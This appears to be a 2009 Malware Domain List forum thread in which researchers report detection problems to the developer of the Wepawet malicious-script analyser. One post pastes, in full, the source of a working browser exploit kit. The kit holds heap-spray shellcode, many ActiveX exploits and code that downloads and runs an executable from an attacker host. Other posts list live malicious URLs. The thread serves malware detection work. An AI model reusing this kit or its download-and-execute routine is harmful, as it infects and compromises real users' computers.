Malware Domain List

Malware Related => Malware Analysis => Topic started by: Orac on January 31, 2009, 11:40:31 am

Title: Wepawet issues
Post by: Orac on January 31, 2009, 11:40:31 am
May not be the best place to post this, please move as neccesary SysAdMini

I tried the above URL Submission Feature yesterday, and it shows the following link as malware free

conex.justfree.com/PHPJackal.txt

In fact its hosting a shell script, to be fair i should mention it was only detected as malware 2/39 by VT
Title: Re: Wepawet issues
Post by: SysAdMini on January 31, 2009, 11:54:36 am
I have started a new topic and moved Orac's posting here.

Here we can collect all Wepawet issues.

@Orac:

Your submission is a php script. Wepawet currently "only" analyzes javascript, flash and pdf files.

Title: Re: Wepawet issues
Post by: mercutio on January 31, 2009, 06:59:23 pm
Correct. To be a little bit more precise, it should only flag as malicious pages that attempt to perform some exploit. That is, all the various fake scan, fake codec pages will be marked as benign (or suspicious, at best).

In general, it's great if you report any problems you find.
Title: Re: Wepawet issues
Post by: SysAdMini on February 06, 2009, 06:50:57 am
Doesn't recognize the javascript/exploit.
Code: [Select]
hxxp://222.188.91.241/ZXEduBaseData/Common/1.htm
http://wepawet.cs.ucsb.edu/view.php?hash=c1db4673fd8e5cc448c9f07e1c393768&t=1233903624&type=js
Title: Re: Wepawet issues
Post by: SysAdMini on February 06, 2009, 12:30:02 pm
Wepawet was able to decode this one
Code: [Select]
fuadrenal.com/mito/?t=2http://wepawet.cs.ucsb.edu/view.php?hash=16f542a1c1a65955c629f0a005e4d87c&t=1233780008&type=js

but is unable to decode a similiar one completely
Code: [Select]
hxxp://fuck-lady.com/prn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=9a234517053af6348b538f319798e327&t=1233921433&type=js
Title: Re: Wepawet issues
Post by: mercutio on February 06, 2009, 07:24:11 pm
OK, I gave a quick look at it and I think this is what happens.

In both cases, the PDF attack (which I could detect) and the SWF attack (which I cannot detect) do not trigger (I should have a fix for this soon).

Then, in the fuandrenal case, the last page contains the xml data binding exploit, for which we don't have a signature, but which is anomalous enough to make the page suspicious. Hence, the detection. In fact, the last eval block shows:
Code: [Select]
nextkey = '';
k = '';
attack_level = 0;
followed by the heapspray function, the shellcode, and the xml_bobo function, which launches the exploit.

In the fuck-lady case, the last page does not contain any exploit. Therefore, the page is marked as benign. In fact, the last eval (and, unfortunately, there is a bug that mixes the orders of evals in the report) only contains:
Code: [Select]
nextkey = '';
k = '';
attack_level = 0;

BTW, interesting encryption scheme to generate the exploit URL...
Title: Re: Wepawet issues
Post by: SysAdMini on February 06, 2009, 07:30:07 pm
BTW, interesting encryption scheme to generate the exploit URL...

Really interesting. I was thinking about publishing a Malzilla decoding howto.
Maybe A. will do it. :)
Title: Re: Wepawet issues
Post by: SysAdMini on February 06, 2009, 11:18:37 pm
Doesn't recognize the javascript/exploit.
Code: [Select]
hxxp://222.188.91.241/ZXEduBaseData/Common/1.htm
http://wepawet.cs.ucsb.edu/view.php?hash=c1db4673fd8e5cc448c9f07e1c393768&t=1233903624&type=js

Hello Marco,

any ideas to this case ?
Title: Re: Wepawet issues
Post by: mercutio on February 07, 2009, 12:57:58 am
Should be better now:
http://wepawet.cs.ucsb.edu/view.php?hash=c1db4673fd8e5cc448c9f07e1c393768&t=1233969016&type=js

I was being a little too restrictive in the type of scripts I was accepting... Thanks!
Title: Re: Wepawet issues
Post by: SysAdMini on February 08, 2009, 01:25:20 pm
Exploits don't work:

http://wepawet.cs.ucsb.edu/view.php?hash=94bf47a94520ba0ba6afcf4dc8f96afb&t=1234100011&type=js
Title: Re: Wepawet issues
Post by: mercutio on February 10, 2009, 12:26:17 am
Mmmh, assuming that you're referring to the fact that some exploits are not detected:
- we don't have a signature for the XML exploit (so you don't find it in the exploit list)
- the PDF exploit was not triggered (incorrectly)
- the snapshot exploit was detected
Please, let me know if you meant something else.

Anyways, I've done some changes so that the PDF exploit triggers:
http://wepawet.cs.ucsb.edu/view.php?hash=94bf47a94520ba0ba6afcf4dc8f96afb&t=1234224850&type=js

Unfortunately, I seem to have some problem extracting the JS from the PDF (did I mention that PDF support is more experimental than everything else? :-)), so we don't detect it yet.

Title: Re: Wepawet issues
Post by: mercutio on February 10, 2009, 01:49:20 am
Quote
Unfortunately, I seem to have some problem extracting the JS from the PDF (did I mention that PDF support is more experimental than everything else? :-)), so we don't detect it yet.

The problem with PDFs should be fixed now:
http://wepawet.cs.ucsb.edu/view.php?hash=66315375f9d89d3e4850ebaf690c322c&t=1234231244&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=11d02f5e15a36bdf8ff9a7f8779b5929&t=1234231130&type=js

Let me know if you find problems.

Thanks!
Title: Re: Wepawet issues
Post by: GmG on February 13, 2009, 10:15:10 am
Tornado Exploit Pack
Code: [Select]
http://do21.net/cv/count.php?o=3

http://wepawet.iseclab.org/view.php?hash=e589b3bee49bdd62828222543d62fa02&t=1234520577&type=js

Wepawet was unable to decode
Title: Re: Wepawet issues
Post by: mercutio on February 13, 2009, 08:56:33 pm
I've done some fixes and I've regenerated the report for your visit:
http://wepawet.iseclab.org/view.php?hash=e589b3bee49bdd62828222543d62fa02&t=1234520577&type=js
Now, the code is decoded correctly.

Exploits were not detected during that visit, so the report still doesn't show them. I've done some other changes that should improve detection, but now the attack is no longer launched when I visit the page, so I cannot test.

Thanks reporting and, please, let me know if you find other problems with similar pages!
Title: Re: Wepawet issues
Post by: SysAdMini on February 13, 2009, 09:16:11 pm
Hello Marco,

thank you very much for your fast reponse to each reported issue.

Keep up the good work !
Title: Re: Wepawet issues
Post by: GmG on February 13, 2009, 10:01:44 pm
I've done some fixes and I've regenerated the report for your visit:
http://wepawet.iseclab.org/view.php?hash=e589b3bee49bdd62828222543d62fa02&t=1234520577&type=js
Now, the code is decoded correctly.

Thanks.

Exploits were not detected during that visit, so the report still doesn't show them. I've done some other changes that should improve detection, but now the attack is no longer launched when I visit the page, so I cannot test.

They log ip, you can try change number at end of count.php (eg count.php?o=2 , count.php?o=3 )

Thanks reporting and, please, let me know if you find other problems with similar pages!

Code: [Select]
http://wwwhttpinfo.ru/gtx/count.php?o=2

 ;)
Title: Re: Wepawet issues
Post by: mercutio on February 18, 2009, 08:55:39 am
I've pushed out a number of updates to the analysis of PDF files (which are now "officially" handled, i.e., mentioned on the front and support page).
Please, let me know if you spot problems in this area.
Title: Re: Wepawet issues
Post by: SysAdMini on February 21, 2009, 04:30:50 am
Code: [Select]
http://www.rmk-lgs.com/images/m/
http://wepawet.cs.ucsb.edu/view.php?hash=00b4bdccdbcfe164e962f96df31177d2&t=1235191455&type=js

Quote
There were some errors. Please try again or let us know of this problem.

Today I have seen this error message for almost any url which I have submitted.

another example:
this url fails. Same problem if you submit the iframes from this and next level manually.

Code: [Select]
hxxp://mydocs.3322.org/pagead/push.htm
Title: Re: Wepawet issues
Post by: SysAdMini on February 22, 2009, 03:48:29 pm
Code: [Select]
reddii.ru/traffic/sploit1/index.php
Error message : Invalid Hostname
Title: Re: Wepawet issues
Post by: mercutio on February 23, 2009, 08:41:45 am
The "Invalid Hostname" problem is a known bug: reports for pages hosted on domains that are no longer resolvable are accessible only by knowing the url of the report and not via the index page. I should have a fix for this by tomorrow. Maybe I should really have a "search" functionality to retrieve reports based on URLs and domains.
In any case, the report for the reddii.ru exploit page is:
http://wepawet.cs.ucsb.edu/view.php?hash=1ba0ce027a854e3a405e2e17bad185d3&t=1231734757&type=js

I will also investigate the "There were some errors" problems.

Thanks.
Title: Re: Wepawet issues
Post by: mercutio on February 23, 2009, 08:59:16 am
I have committed a quick patch for what seems the cause of at least some of the errors you experienced. I've re ran the URLs you submitted. The reports are:
Title: Re: Wepawet issues
Post by: mercutio on February 25, 2009, 10:10:25 pm
I've pushed out an update that should fix both of the above issues.
In particular, regarding the "Invalid Hostname" problem, now if you insert a URL on an invalid domain (e.g., NXDomain) but that URL has been previously analyzed, you're presented with the page that shows the last previous reports. The URL must match exactly a previously analyzed URL for this to work.
I'll probably have a search functionality in the future to improve on this.
Title: Re: Wepawet issues
Post by: SysAdMini on March 16, 2009, 10:48:30 am
exploit undetected

Code: [Select]
thelegion74.com/yu5/index.php
Title: Re: Wepawet issues
Post by: DiFor on March 16, 2009, 02:16:30 pm
this's uniq pack sploit
Code: [Select]
var url="http://thelegion74.com/yu5/load.php?id=322";
var m=new Array();
var mf=0;
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}
function hav(){
m=m;
setTimeout("hav()",1000);
}
function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}
function ms(){
var plc=unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u742F%u6568%u656C%u6967%u6E6F%u3437%u632E%u6D6F%u792F%u3575%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u333D%u3232");
CollectGarbage();
if (mf)return(0);
mf=1;
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++)m[i]=ss+plc;
hav();
return(1);
}
function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
}
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
function Go(a){
var eurl=url;
var fname="winJiomY4cPhiB.exe";
var fso=CreateO(a,"Scripting.FileSystemObject")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
function mdac() {
var i=0;
var target=new Array(
"BD96C556-65A3-11D0-983A-00C04FC29E36",
"BD96C556-65A3-11D0-983A-00C04FC29E30",
"AB9BCEDD-EC7E-47E1-9322-D4A210617116",
"0006F033-0000-0000-C000-000000000046",
"0006F03A-0000-0000-C000-000000000046",
"6e32070a-766d-4ee6-879c-dc1fa91d2fc3",
"6414512B-B978-451D-A0D8-FCFDF33E833C",
"7F5B7F63-F06F-4331-8A26-339E03C0AE3D",
"06723E09-F4C2-43c8-8358-09FCD1DB0766",
"639F725F-1B2D-4831-A9FD-874847682010",
"BA018599-1DB3-44f9-83B4-461454C84BF8",
"D0C07D56-7C69-43F1-B4A0-25F5A11FAB19",
"E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
return 0;
}
function wfi() {
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms();
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
}
}catch(e){}
return 0;
}
function com() {
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms();
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
}
}catch(e){}
return 0;
}
function ya1(){
try {
var obj=null;
obj=cobj("{DCE2F8B1-A520-11D4-8FD0-00D0B7730277}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 5000) buf += buf;
buf = buf.substring(0,5000);
obj.server = buf;
obj.initialize();
obj.send();
}
} catch(e){}
return 0;
}
function ya2(){
try {
var obj=null;
obj=cobj("{9D39223E-AE8E-11D4-8FD3-00D0B7730277}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 5000) buf += buf;
buf = buf.substring(0,5000);
obj.server = buf;
obj.receive();
}
} catch(e){}
return 0;
}
function fb(){
try {
var obj=null;
obj=cobj("{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 400) buf += buf;
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;
}
} catch(e){}
return 0;
}
function mdss(){
try {
var obj=null;
obj=cobj("{EEE78591-FE22-11D0-8BEF-0060081841DE}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
for (i=1;i<=9999;i++)
buf += buf;
EngineID="default";
MfgName="default";
ProductName="default";
ModeID="default";
ModeName=buf;
LanguageID=1;
Dialect="default";
Speaker="default";
Style=1;
Gender=1;
Age=1;
Features=1;
Interfaces=1;
EngineFeatures=1;
RankEngineID=1;
RankMfgName=1;
RankProductName=1;
RankModeID=1;
RankModeName=1;
RankLanguage=1;
RankDialect=1;
RankSpeaker=1;
RankStyle=1;
RankGender=1;
RankAge=1;
RankFeatures=1;
RankInterfaces=1;
RankEngineFeatures=1;
obj.FindEngine(EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures);

}
} catch(e){}
return 0;
}

function office(){
var sfrom = url+"&opr=1";
var fuckavo="SB";
var x;
var fuckavp="SB";
var obj;
var fuckavx="SB";
var mycars = new Array();
var fuckava="SB";
mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
var objlcx = cobj("snpvw.Snapshot Viewer Control.1");
if(objlcx) {
setTimeout('window.location = "ldap://"', 3000);
for (x in mycars){
obj = cobj("snpvw.Snapshot Viewer Control.1")
var buf1 = sfrom;
var fuckavg="SB";
var buf2=mycars[x];
var fuckavj="SB";
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;
try {
obj.CompressedPath = buf2;
obj.PrintSnapshot();
}catch(e){}
}
}
var fuckavqgga="SB";
var fuckavqggxa="SBd";
return 0;
}
function dl(){
try{
var obj=null;
obj=cobj("Downloader.DLoader.1");
if (obj){
obj.DownloadAndInstall(url);
}
}catch(e){}
return 0;
}
function wks(){
try{
var obj=null;
obj=cobj("{00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6}");
if(obj){
ms();
var num = 202116108;
obj.WksPictureInterface = num;
}
}catch(e){}
return 0;
}
function ogame(){
try{
var obj=null;
obj=cobj("{F917534D-535B-416B-8E8F-0C04756C31A8}");
if(obj){
ms();
var buf = "";
while (buf.length < 600) buf += "\x0c\x0c\x0c\x0c";
obj.IEStartNative(buf);
}
}catch(e){}
return 0;
}
function ca(){
try{
var obj=null;
obj=cobj("{BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3}");
if (obj.AddColumn) {
ms();
var buf = addr(0x0c0c0c0c);
while(buf.length < 128)buf += buf;
buf = buf.substring(0, 128);
obj.AddColumn(buf,1);
}
}catch(e){}
return 0;
}
function buddy(){
try {
var obj=null;
obj = cobj("Sb.SuperBuddy");
if (obj) {
ms();
obj.LinkSBIcons(0x0c0c0c0c);
}
} catch(e){}
return 0;
}
function gomweb(){
try {
var obj=null;
obj = cobj("GomWebCtrl.GomManager.1");
if (obj) {
ms();
var buf="AAAA";
while (buf.length < 506) buf += buf;
buf = buf.substring(0,506);
buf += addr(0x0c0c0c0c);
obj.OpenURL(buf);
}
} catch(e){}
return 0;
}
function xmlcore(){
try {
var xml = null;
var xml = cobj("Msxml2.XMLHTTP.6.0");
if (xml){
xml = cobj("Msxml2.XMLHTTP.4.0");
}
if(!xml)return 0;
var obj=null;
obj = cobj("{88d969c5-f192-11d4-a65f-0040963251e5}");
obj = obj.object
if(obj) {
ms();
try {obj.open(new Array(),new Array(),new Array(),new Array(),new Array());} catch(e) {};
obj.open(new Object(),new Object(),new Object(),new Object(),new Object());
obj.setRequestHeader(new Object(),"...");
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
}
} catch(e){}
return 0;
}
function quick(){
try {
var obj=null;
obj = cobj("QuickTime.QuickTime.4");
if (obj) {
ms();
var buf = "";
for(var i=0;i<200;i++) {
buf += "AAAA";
}
buf += "AAA";
for(var i=0;i<3;i++)buf += "\x0c\x0c\x0c\x0c";
var my_div = document.createElement("div");
my_div.innerHTML =
"<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" width=\"200\" height=\"200\">" +
"<param name=\"src\" value=\"object_rtsp\">" +
"<param name=\"type\" value=\"image/x-quicktime\">" +
"<param name=\"autoplay\" value=\"true\">" +
"<param name=\"qtnext1\" value=\"<rtsp://BBBB:"+buf+">T<myself>\">" +
"<param name=\"target\" value=\"myself\">" +
"</object>";
document.body.appendChild(my_div);

}
} catch(e) {}
return 0;
}
function real(){
try {
var obj=null;
obj = cobj("IERPCtl.IERPCtl.1");
if (obj) {
if(obj.PlayerProperty("PRODUCTVERSION")>"6.0.14.552") {
obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
ms();
var m = "";
var buf = addr(0x0c0c0c0c);
while (buf.length < 32) buf += buf;
buf = buf.substring(0,32);
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}
}
} catch(e){}
return 0;
}
function ntaudio(){
try{
var obj=null;
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 5200) buf += buf;
buf = buf.substring(0,5200);
obj.SetFormatLikeSample(buf);
}
}catch(e){}
return 0;
}
function creative(){
try{
var obj=null;
obj=cobj("{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 512) buf += buf;
buf = buf.substring(0,512);
obj.cachefolder = buf;
}
}catch(e){}
return 0;
}

function pdf(){
try {
var obj = null;
obj = cobj("AcroPDF.PDF");
if (!obj) {
obj = cobj("PDF.PdfCtrl");
}
if (obj) {
document.write("<iframe src='http://thelegion74.com/yu5/pdf.php?id=322' width=1 height=1 frameborder=0></iframe>");
setTimeout('pdf2();',10000);
}
} catch(e) {
document.write("<iframe src='http://thelegion74.com/yu5/pdf.php?id=322' width=1 height=1 frameborder=0></iframe>");
setTimeout('pdf2();',10000);
}
return 0;
}
function pdf2(){
var obj = null;
obj = cobj("AcroPDF.PDF");
if (!obj) {
obj = cobj("PDF.PdfCtrl");
}
if (obj) {
wnd=window;
while (wnd.parent!=wnd){ wnd=wnd.parent; }
wnd.location="http://thelegion74.com/yu5/pdf.php?id=322&vis=1";
}
return 0;
}
function wme(){
try {
var obj=null;
obj=cobj("{A8D3AD02-7508-4004-B2E9-AD33F087F43C}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 2000) buf += buf;
buf = buf.substring(0,2000);
obj.GetDetailsString(buf,1);
}
} catch(e){}
return 0;
}

if (
mdac() ||
office() ||
dl() ||
pdf() ||
wme() ||
wfi() ||
com() ||
ya1() ||
ya2() ||
fb() ||
mdss() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
) {}
Title: Re: Wepawet issues
Post by: mercutio on March 16, 2009, 04:10:20 pm
Mmmh, I always get a 302 to google.com from that page (in 4 visits since mid january). But the toolkit is still there, in fact I can get the pdf file:
http://wepawet.cs.ucsb.edu/view.php?hash=a27b690fbe272bc0d6a81df5c4e5755b&t=1237219096&type=js

Do you know if they expect a specific user-agent/referer/ip location before serving the "correct" (i.e., malicious) index.php page?

Regarding the sploit kit, not sure it's uniq: there's an elfiesta admin page at:
Code: [Select]
http://thelegion74.com/yu5/admin.php

Thanks

Title: Re: Wepawet issues
Post by: Serg on March 16, 2009, 04:51:39 pm
i've tried to use referer from here http://www.honeynet.cz/wm/wm?id=f3849038bf6f21b9b7131fd68f (http://www.honeynet.cz/wm/wm?id=f3849038bf6f21b9b7131fd68f) with several user-agent/ip. nothing. same google. DiFor, how did u get that script?
Title: Re: Wepawet issues
Post by: GmG on March 16, 2009, 05:06:53 pm
Work without user agent (I use wget) return
http://wepawet.iseclab.org/view.php?hash=ef4a254e1c9601668caa2caa5997600a&type=js

With user agent Firefox return
Code: [Select]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
http://wepawet.iseclab.org/view.php?hash=4b6c3760defba2d188796257f178ec64&type=js

With user agent IE 6 return
Code: [Select]
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
http://wepawet.iseclab.org/view.php?hash=890e99abad45d88398905cef664f9d57&type=js

Work multiple times
Work   without referer

My IP form Italy


Title: Re: Wepawet issues
Post by: Serg on March 16, 2009, 05:55:57 pm
u r target! ;D Checked via helpblock.me with US IPs, got the exploit. But from home still google.  :-\
Title: Re: Wepawet issues
Post by: DiFor on March 16, 2009, 09:17:53 pm
Initially, rent sploits with a user-agent IE6, Winxp sp1. Then check on the other browsers.

ps: fiesta, uniq, all one and the same. authors are different, the same code.
Title: Re: Wepawet issues
Post by: sowhat-x on March 24, 2009, 06:47:12 am
Quote
hxxp://abbcp.cn/bm_a/controller.php
---> 58.65.237.1

On the same ip,another one domain is currently hosted...
Quote
hxxp://strhq.cn/tds_a/go.php?id=2

So far so good,now this one redirects to...
Quote
hxxp://58.65.237.2/?t=1
---> Wepapet seemed to have ran into trouble with it? ("There was a network error accessing the requested URL: Not Found")
http://wepawet.iseclab.org/view.php?hash=2f5846b4d762532b20efbec069ffc219&t=1237876829&type=js
When requesting the previous strhq.cn url that redirects there,it returns:
Code: [Select]
hxxp://strhq.cn/tds_a/go.php?id=2 302 text/html
hxxp://58.65.237.2/?t=1                 Error application/x-empty
http://wepawet.iseclab.org/view.php?hash=992bceb2dfbb43ca1f3b154ea0bfea10&t=1237877077&type=js

Edit: Seems to me like 58.65.237.2 doesn't let you access it from the same ip twice,but I might be wrong on this...  :(
Title: Re: Wepawet issues
Post by: SysAdMini on March 24, 2009, 07:03:48 am
Quote
So far so good,now this one redirects to...
Quote
hxxp://58.65.237.2/?t=1
---> Wepapet seemed to have ran into trouble with it? ("There was a network error accessing the requested URL: Not Found")
http://wepawet.iseclab.org/view.php?hash=2f5846b4d762532b20efbec069ffc219&t=1237876829&type=js
When requesting the previous strhq.cn url that redirects there,it returns:
Code: [Select]
hxxp://strhq.cn/tds_a/go.php?id=2 302 text/html
hxxp://58.65.237.2/?t=1                 Error application/x-empty
http://wepawet.iseclab.org/view.php?hash=992bceb2dfbb43ca1f3b154ea0bfea10&t=1237877077&type=js

Edit: Seems to me like 58.65.237.2 doesn't let you access it from the same ip twice,but I might be wrong on this...  :(

It is Luckysploit. The behaviour is typical for Luckyploit. You can access the url only once.
The "t" parameter is another Luckysploit indicator.

Title: Re: Wepawet issues
Post by: sowhat-x on March 24, 2009, 07:14:39 am
Yeah,i'm on a dynamic ip,thereby i've disconnected / changed ip,and it worked again fine,
it's the Wepawet's "requested URL: Not Found" that puzzled me...
Title: Re: Wepawet issues
Post by: SysAdMini on March 25, 2009, 07:23:44 pm
http://wepawet.cs.ucsb.edu/view.php?hash=7c81cda7027204c921a019aa993f0b84&type=js

Quote
There was a network error accessing the requested URL: empty response.
Title: Re: Wepawet issues
Post by: mercutio on March 25, 2009, 09:31:01 pm
Just to clarify the error messages:
If these situations occur on the first URL we request (i.e., the one the user submitted for the analysis), we just show the error page, to let the user know that something is wrong (mistyped URL, sites doing IP cloaking, etc.). Of course, if an empty page or a 404 is returned for resources other than the initial one, the normal analysis is performed (and you should see the error associated with the offending URL in the network request section of the report).

Sites that do IP cloaking (store the IP of visitors and serve the exploit code only on the first visit) often send empty or 404 responses on successive visits. It's also common to redirect to benign web sites on successive visits, e.g., newegg, msn.
Title: Re: Wepawet issues
Post by: SysAdMini on April 03, 2009, 06:19:18 pm
Code: [Select]
findwife.asia/unique/index.php
Title: Re: Wepawet issues
Post by: mercutio on April 03, 2009, 11:41:28 pm
I've tried with a few different IPs and different browsers, but this is all I get back:
Code: [Select]
<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1>The requested was not found on this server.<p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.<hr><address>Apache</address></body></html>
Weird: the unique admin panel is up and running and the malicious pdf is also reachable:
http://wepawet.cs.ucsb.edu/view.php?hash=b3ab8df2a2d9f79c9f0cb1c1f6d16225&t=1238802141&type=js
Title: Re: Wepawet issues
Post by: MysteryFCM on April 04, 2009, 12:05:35 am
Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://findwife.asia/unique/index.php
Server IP: 195.190.13.234 [ 234.13.190.195.unknown.SteepHost.Net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 04 April 2009
Time: 00:53:17:53
*****************************************************************
<html><body><script>
